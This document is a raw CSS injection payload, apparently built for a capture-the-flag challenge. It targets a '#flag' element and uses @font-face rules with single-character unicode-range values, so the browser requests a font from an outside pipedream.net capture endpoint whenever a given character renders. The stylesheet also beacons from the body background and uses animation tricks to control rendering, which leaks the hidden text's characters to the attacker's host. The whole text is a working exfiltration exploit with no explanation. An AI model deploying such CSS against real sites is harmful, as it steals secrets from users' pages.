body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W18')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w18,p98w18,p106w18,p112w18,p115w18,p121w18,p122w18,p48w18,p49w18,p52w18,p53w18,p55w18,p125w18,monospace;width:18ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W18');unicode-range:U+0061}
@font-face{font-family:p98w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W18');unicode-range:U+0062}
@font-face{font-family:p106w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W18');unicode-range:U+006A}
@font-face{font-family:p112w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W18');unicode-range:U+0070}
@font-face{font-family:p115w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W18');unicode-range:U+0073}
@font-face{font-family:p121w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W18');unicode-range:U+0079}
@font-face{font-family:p122w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W18');unicode-range:U+007A}
@font-face{font-family:p48w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W18');unicode-range:U+0030}
@font-face{font-family:p49w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W18');unicode-range:U+0031}
@font-face{font-family:p52w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W18');unicode-range:U+0034}
@font-face{font-family:p53w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W18');unicode-range:U+0035}
@font-face{font-family:p55w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W18');unicode-range:U+0037}
@font-face{font-family:p125w18;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W18');unicode-range:U+007D}